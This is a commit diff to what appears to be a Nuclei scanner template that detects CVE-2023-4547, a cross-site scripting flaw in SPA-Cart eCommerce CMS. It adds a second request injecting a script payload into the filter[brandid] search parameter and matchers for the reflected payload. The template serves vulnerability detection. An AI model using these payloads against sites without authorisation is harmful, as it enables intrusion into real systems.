Merge pull request #8472 from projectdiscovery/pussycat0x-patch-2

CVE-2023-4547

http/cves/2023/CVE-2023-4547.yaml

@@ -2,7 +2,7 @@ id: CVE-2023-4547
 
 info:
   name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
-  author: theamanrawat
+  author: theamanrawat,SoSpiRo
   severity: medium
   description: |
     A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
@@ -31,15 +31,22 @@ http:
   - method: GET
     path:
       - '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
+      - '{{BaseURL}}/search?filter[brandid]=vnxjb"><script>alert(document.cookie)</script>bvu51'
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - '100-1331"><script>alert(document.cookie)</script>'
+          - '><script>alert(document.cookie)</script>bvu51'
+        condition: or
+
+      - type: word
+        part: body
+        words:
           - '<table class="products-nav">'
-        condition: and
 
       - type: word
         part: header
@@ -48,5 +55,5 @@ http:
 
       - type: status
         status:
-          - 200
-# digest: 4b0a00483046022100a596d2308a8d60566f7f265670674040d63d3364b32b7e1b98d319340f06392f022100c29a49c0c08077668ffd75b3e48e75239ecbd73a38fb371d4925861a623ef161:922c64590222798bb761d5b6d8e72950
+
+          - 200